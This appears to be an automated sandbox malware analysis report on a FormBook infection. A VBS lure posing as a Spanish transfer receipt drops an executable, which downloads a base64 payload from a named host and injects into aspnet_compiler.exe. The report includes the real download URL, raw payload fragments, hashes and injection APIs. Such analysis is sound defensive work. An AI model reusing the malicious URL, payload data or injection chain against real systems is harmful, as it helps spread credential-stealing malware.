Oct 3, 2024 09:20:49.574254036 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.574316025 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.574321985 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.574366093 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.574367046 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.574378967 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.574418068 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.574579000 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.574640036 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.574754000 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.574809074 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.575033903 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.575100899 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.575189114 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.575258017 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.702676058 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.702725887 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.702760935 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.702949047 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.702949047 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.702980995 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.703608990 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.703646898 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.703685999 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.703691959 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.703716993 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.703768015 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.703818083 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.703823090 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.703845978 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.703893900 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.703912020 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.703917980 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.703944921 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.703957081 CEST	443	49710	104.196.109.209	192.168.2.12
Oct 3, 2024 09:20:49.703962088 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.704003096 CEST	49710	443	192.168.2.12	104.196.109.209
Oct 3, 2024 09:20:49.709435940 CEST	49710	443	192.168.2.12	104.196.109.209

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 09:20:47.563523054 CEST	63063	53	192.168.2.12	1.1.1.1
Oct 3, 2024 09:20:47.805182934 CEST	53	63063	1.1.1.1	192.168.2.12

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2024 09:20:47.563523054 CEST	192.168.2.12	1.1.1.1	0x585a	Standard query (0)	transfer.adttemp.com.br	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2024 09:20:47.805182934 CEST	1.1.1.1	192.168.2.12	0x585a	No error (0)	transfer.adttemp.com.br		104.196.109.209	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

transfer.adttemp.com.br

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49710	104.196.109.209	443	6736	C:\Users\user\AppData\Local\Temp\temp_executable.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-03 07:20:48 UTC	93	OUT	GET /2alBy/sirdeeeeee.txt HTTP/1.1 Host: transfer.adttemp.com.br Connection: Keep-Alive
2024-10-03 07:20:49 UTC	313	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 07:20:49 GMT Server: Transfer.sh HTTP Server 1.0 Content-Disposition: attachment; filename="sirdeeeeee.txt" Content-Length: 382988 Content-Type: text/plain; charset=utf-8 X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Connection: close
2024-10-03 07:20:49 UTC	3783	IN	Data Raw: 4d 4a 56 4a 41 56 77 38 64 63 38 7a 6e 63 4b 76 78 58 46 52 6b 7a 37 33 44 35 46 72 77 52 41 6a 69 35 6e 72 33 66 69 73 2b 39 6d 4f 55 49 54 32 2f 67 66 41 41 6d 68 6b 4d 51 33 67 6c 70 36 66 67 4f 39 4e 44 38 41 6d 50 6e 4b 49 79 4b 6d 46 54 65 36 4f 37 41 4a 45 76 79 74 66 61 34 75 32 48 4f 63 52 6e 72 68 44 68 34 7a 64 37 4b 66 51 2b 30 43 51 4c 61 4a 70 54 39 7a 4f 30 50 38 71 52 4f 51 7a 4d 76 41 70 6f 6f 49 42 43 2f 76 74 63 50 2b 43 2f 35 2f 41 55 45 75 64 6a 76 73 2f 4d 57 78 65 36 4a 6c 44 46 45 43 34 2b 6f 31 6a 4b 62 33 66 41 45 53 49 4f 63 47 78 56 59 75 65 56 6e 4b 5a 52 65 78 56 5a 52 70 58 70 50 34 4c 48 6e 34 74 2f 6b 74 52 41 6b 50 30 77 77 42 70 37 75 67 71 76 55 4e 36 4a 73 37 30 48 78 56 56 4e 75 4f 73 78 34 54 4c 48 34 5a 49 73 4a 42 Data Ascii: MJVJAVw8dc8zncKvxXFRkz73D5FrwRAji5nr3fis+9mOUIT2/gfAAmhkMQ3glp6fgO9ND8AmPnKIyKmFTe6O7AJEvytfa4u2HOcRnrhDh4zd7KfQ+0CQLaJpT9zO0P8qROQzMvApooIBC/vtcP+C/5/AUEudjvs/MWxe6JlDFEC4+o1jKb3fAESIOcGxVYueVnKZRexVZRpXpP4LHn4t/ktRAkP0wwBp7ugqvUN6Js70HxVVNuOsx4TLH4ZIsJB
2024-10-03 07:20:49 UTC	4409	IN	Data Raw: 79 7a 78 6d 45 6f 76 59 6f 42 31 47 32 68 42 76 6a 39 36 6a 6c 54 71 46 6e 4d 31 50 32 78 6f 6d 56 39 68 48 46 79 5a 37 62 46 30 79 59 31 62 48 70 42 46 75 6f 45 6a 56 57 66 54 53 52 4b 43 59 53 75 44 64 45 47 47 4f 74 30 65 6f 45 55 6e 68 74 33 6e 64 47 49 4c 57 56 51 69 44 52 63 50 30 51 61 75 59 62 47 43 31 4a 51 72 6d 4e 63 49 47 6f 79 52 33 43 69 62 4a 68 72 65 66 46 48 46 6f 44 32 76 49 4d 6e 75 79 37 31 2b 64 76 2f 62 62 41 41 5a 54 41 35 51 44 53 55 30 59 62 4e 52 41 44 41 30 38 45 47 41 63 6e 54 31 6c 56 78 55 58 66 51 41 79 56 38 5a 69 5a 63 41 4b 38 73 34 6f 45 78 4f 65 30 4e 6b 2f 46 78 48 76 48 67 68 36 67 39 55 6a 78 37 50 5a 62 6e 48 44 72 6e 47 4d 41 50 68 50 68 74 79 78 77 4f 7a 7a 53 4c 70 55 46 6e 5a 6a 6d 38 46 31 4b 58 6d 6b 39 52 6b Data Ascii: yzxmEovYoB1G2hBvj96jlTqFnM1P2xomV9hHFyZ7bF0yY1bHpBFuoEjVWfTSRKCYSuDdEGGOt0eoEUnht3ndGILWVQiDRcP0QauYbGC1JQrmNcIGoyR3CibJhrefFHFoD2vIMnuy71+dv/bbAAZTA5QDSU0YbNRADA08EGAcnT1lVxUXfQAyV8ZiZcAK8s4oExOe0Nk/FxHvHgh6g9Ujx7PZbnHDrnGMAPhPhtyxwOzzSLpUFnZjm8F1KXmk9Rk
2024-10-03 07:20:49 UTC	3591	IN	Data Raw: 4e 2f 4e 79 4c 44 41 36 34 69 62 41 39 62 32 70 4c 76 6f 59 76 43 34 35 55 45 55 31 6f 7a 44 39 36 2f 66 53 32 35 7a 74 62 7a 48 34 4b 6e 52 47 2b 51 56 67 56 54 78 52 45 75 4b 64 47 4e 76 6b 32 59 55 54 2b 4e 57 52 63 49 32 79 6f 68 57 71 51 78 77 56 52 6b 41 61 50 36 2b 68 4e 42 57 65 33 4f 43 65 71 62 62 5a 49 54 50 33 77 6a 77 43 54 72 54 64 52 79 49 76 61 66 61 35 33 70 76 55 37 34 43 71 44 79 30 53 76 77 56 79 77 77 2b 74 33 4d 74 7a 62 4e 43 30 54 2f 6e 45 56 5a 57 32 4c 77 46 7a 33 42 6c 70 66 4d 64 49 6e 56 4d 79 37 53 42 41 38 51 6e 48 59 6f 37 41 39 4c 4b 38 38 6a 6f 75 30 70 32 45 2f 63 4b 45 78 48 50 38 46 67 74 4c 71 6b 58 52 4e 50 63 49 52 4a 45 72 61 54 4e 52 44 6c 79 65 51 68 43 71 6c 56 73 32 6a 43 6d 34 48 6a 77 49 2f 45 38 7a 77 30 30 Data Ascii: N/NyLDA64ibA9b2pLvoYvC45UEU1ozD96/fS25ztbzH4KnRG+QVgVTxREuKdGNvk2YUT+NWRcI2yohWqQxwVRkAaP6+hNBWe3OCeqbbZITP3wjwCTrTdRyIvafa53pvU74CqDy0SvwVyww+t3MtzbNC0T/nEVZW2LwFz3BlpfMdInVMy7SBA8QnHYo7A9LK88jou0p2E/cKExHP8FgtLqkXRNPcIRJEraTNRDlyeQhCqlVs2jCm4HjwI/E8zw00
2024-10-03 07:20:49 UTC	4601	IN	Data Raw: 31 51 5a 74 78 55 68 33 6e 36 6f 46 59 78 38 77 58 45 6b 4d 72 7a 78 41 74 51 77 34 49 6f 64 63 72 32 6d 69 36 79 5a 55 4c 2f 50 34 5a 52 4d 2f 2f 64 39 79 47 49 65 4a 53 48 51 33 37 55 55 4a 37 37 58 70 74 51 35 4e 4e 49 57 72 46 41 62 33 36 74 4e 43 64 56 64 37 35 54 55 66 78 2f 53 7a 67 52 79 4e 76 6f 37 39 32 4f 38 71 4e 75 49 4c 32 71 73 70 32 55 6e 38 6a 54 52 2b 73 73 6b 2b 71 53 50 45 6f 56 6e 50 47 65 37 42 6a 73 4c 7a 53 4b 59 63 71 73 31 36 4f 30 4f 4c 34 37 61 41 77 50 4c 65 36 73 37 48 33 31 61 53 36 67 4f 56 6d 2b 4d 35 48 48 32 36 68 77 70 79 4d 57 57 4e 63 32 63 39 6f 48 30 6b 6a 53 2f 39 38 47 4f 6a 34 46 49 75 58 57 4d 2f 49 78 5a 77 75 71 75 47 49 32 52 37 4a 61 31 39 6a 43 65 7a 63 4f 6c 4c 74 62 44 34 2b 53 6a 41 4c 65 35 78 43 38 38 Data Ascii: 1QZtxUh3n6oFYx8wXEkMrzxAtQw4Iodcr2mi6yZUL/P4ZRM//d9yGIeJSHQ37UUJ77XptQ5NNIWrFAb36tNCdVd75TUfx/SzgRyNvo792O8qNuIL2qsp2Un8jTR+ssk+qSPEoVnPGe7BjsLzSKYcqs16O0OL47aAwPLe6s7H31aS6gOVm+M5HH26hwpyMWWNc2c9oH0kjS/98GOj4FIuXWM/IxZwuquGI2R7Ja19jCezcOlLtbD4+SjALe5xC88
2024-10-03 07:20:49 UTC	3399	IN	Data Raw: 50 57 33 6b 6e 55 75 77 76 78 6d 77 62 4a 50 4f 53 49 77 42 42 55 4c 4e 74 63 4f 6a 44 57 33 42 54 6f 6e 4e 70 63 6e 57 70 37 37 45 34 51 71 62 58 77 65 76 43 62 52 30 7a 64 61 56 34 4f 75 63 67 41 61 79 45 39 62 58 6f 48 70 57 62 57 48 4b 73 34 32 48 6c 32 6d 6b 49 59 33 61 55 38 4d 73 30 46 51 4a 67 33 69 51 4b 35 57 4b 38 39 4a 79 63 59 62 69 46 57 56 46 37 4c 78 54 45 62 68 70 62 4c 4e 6a 73 32 77 56 39 7a 64 2b 63 55 35 37 67 71 37 36 62 49 6b 63 39 49 73 4a 74 54 71 71 38 35 68 74 53 33 63 6e 32 5a 70 70 33 6f 6c 34 47 76 41 6f 62 58 73 75 70 47 75 37 4b 57 62 64 56 64 34 52 36 58 62 42 79 79 6e 50 7a 4b 64 64 7a 54 39 71 37 38 34 68 41 4f 46 51 79 67 2b 69 61 56 59 31 42 69 34 45 5a 62 75 59 49 53 33 4b 61 48 58 52 6f 50 4e 44 2b 57 50 35 48 6f 44 Data Ascii: PW3knUuwvxmwbJPOSIwBBULNtcOjDW3BTonNpcnWp77E4QqbXwevCbR0zdaV4OucgAayE9bXoHpWbWHKs42Hl2mkIY3aU8Ms0FQJg3iQK5WK89JycYbiFWVF7LxTEbhpbLNjs2wV9zd+cU57gq76bIkc9IsJtTqq85htS3cn2Zpp3ol4GvAobXsupGu7KWbdVd4R6XbByynPzKddzT9q784hAOFQyg+iaVY1Bi4EZbuYIS3KaHXRoPND+WP5HoD
2024-10-03 07:20:49 UTC	4793	IN	Data Raw: 54 36 4c 4d 5a 51 44 45 4b 5a 31 37 64 75 72 44 6a 2f 33 4e 36 78 41 65 72 6c 59 48 46 47 34 72 74 73 2f 56 59 44 4f 2f 69 59 51 50 76 32 45 61 6d 4c 34 4e 31 41 4b 4d 5a 52 2b 31 33 33 41 71 2f 52 54 57 30 57 63 41 61 52 36 31 2b 6b 53 35 37 74 47 73 67 4d 4e 51 64 70 43 35 49 62 6d 2f 46 43 43 53 65 52 6a 59 50 4e 4b 35 7a 72 75 73 47 31 4f 35 30 33 56 33 6a 64 69 36 33 33 4b 56 55 61 79 48 30 6d 74 73 64 57 57 54 33 6d 79 30 4f 69 36 6c 4a 44 4e 44 64 33 6d 76 2f 7a 7a 55 6f 34 2b 56 4c 70 70 66 41 32 48 6f 6a 6b 41 47 69 75 74 59 32 47 65 30 45 74 62 44 4b 55 4f 6a 69 56 33 73 61 39 62 45 55 68 31 2f 35 66 75 38 4c 63 63 6a 72 58 6a 72 67 75 4a 37 51 45 4b 31 77 50 30 50 64 63 79 59 77 77 73 53 61 4b 51 43 4c 66 59 56 48 77 34 44 58 58 66 64 56 4d 77 Data Ascii: T6LMZQDEKZ17durDj/3N6xAerlYHFG4rts/VYDO/iYQPv2EamL4N1AKMZR+133Aq/RTW0WcAaR61+kS57tGsgMNQdpC5Ibm/FCCSeRjYPNK5zrusG1O503V3jdi633KVUayH0mtsdWWT3my0Oi6lJDNDd3mv/zzUo4+VLppfA2HojkAGiutY2Ge0EtbDKUOjiV3sa9bEUh1/5fu8LccjrXjrguJ7QEK1wP0PdcyYwwsSaKQCLfYVHw4DXXfdVMw
2024-10-03 07:20:49 UTC	3207	IN	Data Raw: 4c 6e 41 63 76 53 7a 68 56 43 30 72 47 79 67 5a 65 44 38 42 70 4c 48 73 6a 59 2f 53 75 51 2b 6e 55 6f 47 36 63 2b 63 31 79 31 6c 51 64 38 67 4e 69 66 41 73 78 72 75 34 6f 43 4d 69 30 7a 76 34 69 32 33 6e 36 4f 7a 63 44 62 79 4b 35 58 4f 34 39 6f 79 47 6b 47 34 58 44 34 78 42 50 36 44 7a 67 61 67 41 6d 50 79 31 78 54 39 47 45 4f 73 68 38 54 78 51 59 74 5a 59 74 79 51 4b 4b 48 2b 39 44 53 56 34 5a 4e 30 6b 69 53 61 79 43 6c 77 4e 56 56 65 68 2f 73 35 33 72 73 67 55 53 36 75 34 43 75 37 57 74 77 42 75 75 42 78 64 76 42 57 54 4a 42 72 47 6e 49 38 62 33 79 68 36 6b 52 43 35 48 7a 44 44 2b 6e 74 39 43 78 47 51 70 4e 6d 55 71 69 68 54 53 41 44 57 4e 68 31 76 30 33 61 49 2b 30 35 58 42 49 55 56 34 35 5a 61 55 70 4d 53 59 6d 69 4c 66 33 61 69 2b 6f 6a 6d 63 70 52 Data Ascii: LnAcvSzhVC0rGygZeD8BpLHsjY/SuQ+nUoG6c+c1y1lQd8gNifAsxru4oCMi0zv4i23n6OzcDbyK5XO49oyGkG4XD4xBP6DzgagAmPy1xT9GEOsh8TxQYtZYtyQKKH+9DSV4ZN0kiSayClwNVVeh/s53rsgUS6u4Cu7WtwBuuBxdvBWTJBrGnI8b3yh6kRC5HzDD+nt9CxGQpNmUqihTSADWNh1v03aI+05XBIUV45ZaUpMSYmiLf3ai+ojmcpR
2024-10-03 07:20:49 UTC	4985	IN	Data Raw: 5a 65 32 65 42 30 79 4c 38 5a 31 75 79 35 4c 65 4d 44 7a 4a 6a 71 30 54 37 53 7a 70 58 33 64 44 57 6e 47 5a 6d 6c 31 49 30 7a 44 70 33 45 49 5a 6c 49 5a 48 54 67 63 6e 72 63 77 66 5a 4f 54 6b 74 47 39 47 68 57 42 4c 63 6e 37 6b 62 37 63 6a 63 6e 30 4c 6e 35 47 67 66 72 69 68 4b 5a 4e 59 50 54 56 53 2b 34 62 52 31 74 4b 49 70 79 39 73 48 76 37 76 74 71 79 46 44 57 65 51 66 65 61 54 36 4e 75 79 50 49 58 58 33 4f 63 4a 46 35 6b 6d 39 2b 6b 64 4a 6b 2b 59 64 49 63 54 4c 56 62 70 53 76 39 43 49 6a 59 4e 75 37 36 4f 50 2f 4c 75 4a 51 76 65 4e 30 6f 39 59 51 5a 6b 58 73 56 54 31 56 69 2b 74 6b 45 78 34 53 2f 52 30 63 2f 62 58 42 67 62 79 5a 49 45 67 44 35 56 56 43 4d 77 49 68 63 4a 6c 77 45 4f 4d 74 74 39 77 66 4f 6e 68 37 54 6b 66 63 66 51 54 6e 73 55 54 62 77 Data Ascii: Ze2eB0yL8Z1uy5LeMDzJjq0T7SzpX3dDWnGZml1I0zDp3EIZlIZHTgcnrcwfZOTktG9GhWBLcn7kb7cjcn0Ln5GgfrihKZNYPTVS+4bR1tKIpy9sHv7vtqyFDWeQfeaT6NuyPIXX3OcJF5km9+kdJk+YdIcTLVbpSv9CIjYNu76OP/LuJQveN0o9YQZkXsVT1Vi+tkEx4S/R0c/bXBgbyZIEgD5VVCMwIhcJlwEOMtt9wfOnh7TkfcfQTnsUTbw
2024-10-03 07:20:49 UTC	3015	IN	Data Raw: 58 58 52 35 37 37 38 32 58 66 37 2f 32 2f 6d 49 4a 48 68 50 32 68 2b 54 44 74 74 70 46 4b 2f 6c 2b 77 32 41 45 76 33 4c 79 4b 63 53 76 70 36 59 34 39 72 4f 53 36 58 62 4e 69 33 36 38 2f 6e 4f 63 54 31 78 53 4e 41 6a 70 67 46 77 69 6a 6b 4c 4d 34 41 51 52 6a 56 57 63 48 5a 69 35 54 77 56 36 56 34 68 33 62 35 6a 4a 59 6e 49 37 6e 39 4b 55 6a 76 36 71 66 5a 6d 4a 51 2b 33 69 68 67 77 41 58 66 79 35 6f 6a 49 76 45 2f 57 68 6a 66 7a 6c 4d 75 4c 35 62 62 44 4d 30 65 6f 72 4a 48 36 72 39 73 73 37 38 38 4b 76 37 73 46 66 6d 56 35 78 70 4d 33 53 4e 72 38 47 31 43 68 36 38 32 58 42 34 47 76 73 54 52 6d 68 44 39 73 2f 66 76 4b 6d 4f 2b 79 65 57 4f 67 6d 71 30 43 58 48 54 69 34 48 70 7a 6b 6c 63 39 62 7a 37 2b 62 6b 70 73 45 51 54 57 31 6d 68 47 4d 4c 4c 75 6b 42 30 Data Ascii: XXR57782Xf7/2/mIJHhP2h+TDttpFK/l+w2AEv3LyKcSvp6Y49rOS6XbNi368/nOcT1xSNAjpgFwijkLM4AQRjVWcHZi5TwV6V4h3b5jJYnI7n9KUjv6qfZmJQ+3ihgwAXfy5ojIvE/WhjfzlMuL5bbDM0eorJH6r9ss788Kv7sFfmV5xpM3SNr8G1Ch682XB4GvsTRmhD9s/fvKmO+yeWOgmq0CXHTi4Hpzklc9bz7+bkpsEQTW1mhGMLLukB0
2024-10-03 07:20:49 UTC	5177	IN	Data Raw: 48 41 45 35 65 4a 67 6a 52 76 44 36 35 74 73 65 65 6c 43 6e 76 76 69 4a 42 58 78 55 51 70 6f 77 35 4b 73 71 63 34 47 65 67 41 44 6b 44 6f 59 77 30 64 45 6c 78 56 72 51 49 52 67 32 71 4a 79 4a 33 75 54 55 52 41 70 34 73 6a 33 61 78 55 56 6b 39 6d 61 4d 30 5a 7a 45 38 69 32 55 35 38 65 77 4b 50 58 51 63 36 76 4b 65 61 61 79 39 39 33 6f 4a 39 61 74 36 54 41 49 51 77 44 6e 50 4d 75 74 34 74 4e 47 36 4e 6a 48 4f 79 33 38 71 45 68 66 47 79 56 73 51 6a 4b 4d 4e 79 64 35 46 6c 78 39 38 76 59 6c 76 47 73 47 30 34 2f 79 42 38 6f 37 68 68 73 4c 4f 4a 43 55 38 78 6e 54 32 79 42 6a 4e 78 4f 7a 70 46 6a 50 46 73 4e 41 39 44 68 74 74 67 49 61 4f 56 79 2f 50 30 6d 4f 71 6a 62 66 45 50 76 41 67 66 70 4d 7a 30 56 52 66 4e 32 61 56 62 39 71 78 65 79 34 6d 77 75 34 59 47 49 Data Ascii: HAE5eJgjRvD65tseelCnvviJBXxUQpow5Ksqc4GegADkDoYw0dElxVrQIRg2qJyJ3uTURAp4sj3axUVk9maM0ZzE8i2U58ewKPXQc6vKeaay993oJ9at6TAIQwDnPMut4tNG6NjHOy38qEhfGyVsQjKMNyd5Flx98vYlvGsG04/yB8o7hhsLOJCU8xnT2yBjNxOzpFjPFsNA9DhttgIaOVy/P0mOqjbfEPvAgfpMz0VRfN2aVb9qxey4mwu4YGI

Target ID:	1
Start time:	03:20:44
Start date:	03/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\justificante de transferencia.vbs"
Imagebase:	0x7ff68c2c0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:20:46
Start date:	03/10/2024
Path:	C:\Users\user\AppData\Local\Temp\temp_executable.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\temp_executable.exe"
Imagebase:	0x220000
File size:	88'064 bytes
MD5 hash:	2A4E91A8185BC07992B63042C7A08059
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:20:49
Start date:	03/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnet_compiler.exe"
Imagebase:	0xef0000
File size:	56'368 bytes
MD5 hash:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2893941306.00000000013C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.2893631913.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	32.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	25.8%
Total number of Nodes:	93
Total number of Limit Nodes:	4

Executed Functions

Function 00BC2B28 Relevance: 1.9, Strings: 1, Instructions: 616
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 00BC333B

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: MemoryProcessWrite
String ID: (
API String ID: 3559483778-3887548279
Opcode ID: e7eb49111beefe73d8e8ad671c3bb1b73daf4c10f9c25e16de34bc9e3cd997b9
Instruction ID: 8a3e378e01bb4d39b0b4cf0f199beb03bac84d5a67e69d2deacfa6b0c24021f4
Opcode Fuzzy Hash: e7eb49111beefe73d8e8ad671c3bb1b73daf4c10f9c25e16de34bc9e3cd997b9
Instruction Fuzzy Hash: A152CF74E012288FDB64DF69C954BDDBBF2BB88300F1085EAD509AB291DB345E85CF54

Function 00BC11D8 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87b82308045455a78d8cb37d605ebf1767c46212a257b3ec104cbc5df157eda9
Instruction ID: 62c5206063f2e10e79d6a0e0e8133e7b6f90c635e6194c226994ebb85e576b56
Opcode Fuzzy Hash: 87b82308045455a78d8cb37d605ebf1767c46212a257b3ec104cbc5df157eda9
Instruction Fuzzy Hash: 48D1BF74A01209CFCB14CFA9C884ADDBBF6FF89314F1496A9D405AB366D730A986CF50

Function 00BC21DF Relevance: 3.3, APIs: 2, Instructions: 326
processinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,00000005,?,?,?,?,?,?), ref: 00BC39CD
WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 00BC3E6D

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: Process$CreateMemoryWrite
String ID:
API String ID: 575940244-0
Opcode ID: 2fc9c00e3cd82eb2705d1fc6e2af64f4aa53fe1c5e51e7e06f27740a4c86b3e1
Instruction ID: 43317e99ad03cb2b7fc04d6cd9cc6953425969246474e401893cc373342a5632
Opcode Fuzzy Hash: 2fc9c00e3cd82eb2705d1fc6e2af64f4aa53fe1c5e51e7e06f27740a4c86b3e1
Instruction Fuzzy Hash: 12D16571D006199FDB10DFA9C881BEEBBF1FF48714F0481AAE859A7280D7749A85CF91

Function 00BC21FC Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,00000005,?,?,?,?,?,?), ref: 00BC39CD

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 5208bc9948c02d792128918cde983cffabc728f960f35ce9fa00e68492d2de72
Instruction ID: 3fbe2920d188d1804fdd4cc99b016d2e74506a0c99ad6e08c28f6788a5237d32
Opcode Fuzzy Hash: 5208bc9948c02d792128918cde983cffabc728f960f35ce9fa00e68492d2de72
Instruction Fuzzy Hash: EE915971D00619DFDB20DFA8C881BDDBBF2EF48704F1481AAE849A7280D7759A85CF91

Function 00BC378C Relevance: 1.7, APIs: 1, Instructions: 242
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,00000005,?,?,?,?,?,?), ref: 00BC39CD

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9b754a06a74c46ff115f03ca91bb40a4d05c6ca196d431d536b61133156d0693
Instruction ID: b6179ab8523cae54dd4b4f5919bbd6bee398a76370c21f5cdc58caa07deebb2e
Opcode Fuzzy Hash: 9b754a06a74c46ff115f03ca91bb40a4d05c6ca196d431d536b61133156d0693
Instruction Fuzzy Hash: F7914871D00619DFDB20DFA8C881BDDBBF2EF48714F1485AAE849A7280D7749A85CF91

Function 00BC3DD8 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,00000000,00000000,?,00010002), ref: 00BC3E6D

Memory Dump Source

Source File: 00000002.00000002.2440434059.0000000000BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_bc0000_temp_executable.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
